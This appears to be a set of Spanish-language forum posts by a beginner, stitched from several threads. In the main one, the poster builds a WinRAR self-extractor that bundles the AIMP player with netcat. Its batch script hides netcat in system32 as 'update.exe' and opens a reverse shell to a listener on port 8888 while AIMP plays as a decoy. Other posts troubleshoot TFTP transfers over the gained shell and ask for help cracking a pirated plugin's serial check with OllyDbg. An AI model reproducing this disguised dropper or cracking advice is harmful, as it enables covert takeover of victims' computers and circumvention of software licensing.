Instale otro server TFTP , el SolarWinds TFTP y tengo el mismo problema.

En todos los tutoriales que lei lo hacian asi , sospecho que es un problema con el VirtualBox, puede ser?

Hola!ya me di cuenta que pasaba . Tambien es buena solucion la que me diste en cualquier caso, no lo habia pensado.

1) El problema estaba en la proceso de extraccion del auto-extraible EN la VirtualBox, porque intente extraerlo en mi maquina y lo hace en un segundo.

Entonces probe extraer algunos .rar en la VirtualBox pero me anduvo perfecto. Es probable que sea el instalador del AIMP porque recien probe con otro instalador hacer un auto-extraible y anduvo rapido.


2) Otra cuestion es que en el auto-extraible, apretando boton derecho->Propiedades, en la solapa Comentarios avisa que se va a ejecutar un archivo ejecutable luego de la extraccion.
Lo unico que lo disfraza un poco es el icono .
Estuve leyendo de los binders y joiners pero son muy detectables . Por ahi me faltaria probar con el IExpress o el SFX Compiler , aunque me da la sensacion de que queda igual que hacerlo con el WinRar.

Soy bastante principiante si..

Antes de empezar quiero aclarar que todo me funciono, el problema es que al hacer doble click en el autoextraible, tarda como 5 segundos en hacer todo ,y queda sospechoso.


Hice un autoextraible SFX con el Winrar, en donde meti 3 programas:

- AIMP_2.10.exe
- netcat.exe
- instrucciones.exe

El AIMP es el reproductor de audio.
El archivo instrucciones.exe lo escribi en .bat y lo compile con el QuickBFC para que se ejecute en modo oculto (o ghost). Y dice:

---------
@echo off
copy netcat.exe %SystemRoot%\system32\update.exe
del netcat.exe
cd %SystemRoot%\system32
attrib +H +S update.exe
start /B %SystemRoot%\system32\update -d -e cmd.exe 192.168.1.101 8888
cd %HomeDrive%\tmp
start AIMP_2.10.exe
---------

Para eso yo desde mi maquina atacante ya estoy escuchando en el puerto 8888 . Y el auto-extraible lo abro desde una maquina victima en el VirtualBox.

Es decir que el auto-extraible lo que hace es descomprimir los archivos en una carpeta temporal (c:\tmp) y ejecutar el archivo "instrucciones.exe". Pero tarda como 5 segundos obtener la shell y recien abrir el AIMP_2.10.exe

Pero si yo en vez de abrir el auto-extraible , extraigo los archivos a una carpeta y ejecuto el "instrucciones.exe" , pasa todo en un instante.

Por lo que deduzco que el problema esta en el auto-extraible .. Queria consultarles si estoy errado, y si puedo hacer algo para agilizar el proceso

El tema es asi.

Tengo mi maquina (atacante, ip 192.168.1.101), y un VirtualBox (victima, ip 10.0.2.10), las dos con windows xp sp2. Hice shell inversa con el NETCAT , y obtuve la shell de la maquina victima .

Ahora yo quiero tranferir archivos por TFTP .
Instale el server TFTPd32 en mi maquina (atacante) y lo tengo andando. Ya configure la carpeta base, y en Security le di None.

En la carpeta base tengo un archivo "hola.txt" .
Introduzco la siguiente sentencia en la maquina victima por la shell que obtuve:

C:\> tftp -i 192.168.1.101 get hola.txt

y me termina diciendo Tiempo de espera agotado.

El log del tftpd32 me dice:

Connection received from 192.168.1.101 on port 1991 [20/02 13:34:09.046]
Read request for file <hola.txt>. Mode octet [20/02 13:34:09.046]
Using local port 1992 [20/02 13:34:09.046]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:09.093]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:10.078]
Read request for file <hola.txt>. Mode octet [20/02 13:34:10.078]
Using local port 1993 [20/02 13:34:10.078]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:10.140]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:12.140]
Read request for file <hola.txt>. Mode octet [20/02 13:34:12.140]
Using local port 1994 [20/02 13:34:12.140]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:12.187]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:16.234]
Read request for file <hola.txt>. Mode octet [20/02 13:34:16.234]
Using local port 1995 [20/02 13:34:16.234]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:16.296]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:24.296]
Read request for file <hola.txt>. Mode octet [20/02 13:34:24.296]
Using local port 1996 [20/02 13:34:24.296]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:24.343]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:32.343]
Read request for file <hola.txt>. Mode octet [20/02 13:34:32.343]
Using local port 2001 [20/02 13:34:32.343]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:32.406]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:40.390]
Read request for file <hola.txt>. Mode octet [20/02 13:34:40.406]
Using local port 2002 [20/02 13:34:40.406]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:40.453]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:48.453]
Read request for file <hola.txt>. Mode octet [20/02 13:34:48.453]
Using local port 2003 [20/02 13:34:48.453]
Peer returns ERROR <Sorry, wasn't talking to you!> -> aborting transfer [20/02 13:34:48.500]
Connection received from 192.168.1.101 on port 1991 [20/02 13:34:56.500]
Unexpected request 5 from peer [20/02 13:34:56.500]
Returning EBADOP to Peer [20/02 13:34:56.500]



Alguien sabe que puede estar sucediendo?
Aclaro que tengo los firewall desactivados en las dos maquinas.

Generalmente no es tan facil me imagino como en este caso..
Al final alguien sabe como aparecio la lista negra? ..El programa puede tener alguna conexion a internet y agregar lineas al programa?

LSL.
Sos un genio.

Lo que yo pense fue que esa era la lista de serials validos y que habia otra linea que me estaban llevando a las ventanas de alerta.
Ahora, no se como se "creo esa lista negra" porque cuando yo lo instale me anduvo como 1 mes el programa con una de esos serials.
Te juro que hace 2 horas que estoy leyendo el tutorial de Narvaja porque no me venia mal saber un poco de esto y es lento pero se entiende casi todo .

Les hago una pregunta mas. Me imagino que se puede hacer mil cosas con el Olly..es como desarmar el programa..buscar y ver de donde vino tal cosa.
Que otras cosas aparte del cracking se pueden hacer con el Olly?

UN ABRAZO ,GRACIAS!!!

SI. Me lo baje.
Voy a leerlo
Ustedes que estan en tema...Asi como se ve en la foto, no parece dificil..figuran todas las claves..pero por ahi no lo es, no?
Igual el tema es que por mas que tenga la clave bien, hay un proceso antes que esta jodiendo..

Buenas. Baje un programa, un secuenciador de baterias, es un plugin, archivo .dll
Se llama Guru. lo instale y busque el serial y anduvo perfecto pero ahora me salta el siguiente aviso "This GURU is using an illegal pirated serial number and has been deactivated, and your IP has been logged".
CREO, que fue a partir de que me registre en la pagina oficial para bajar el manual, un boludo si.
El tema es que estoy investigando pero no cazo una con el desensamblador. Si alguien tiene idea como seguir le agredeciera eternamente.
Aca adjunto una foto de hasta donde llegue con el Ollydbg, y por las dudas el .dll en cuestion.

Guru.dll  ->  http://www.mediafire.com/?tw7jilh4oc55i06



un Abrazo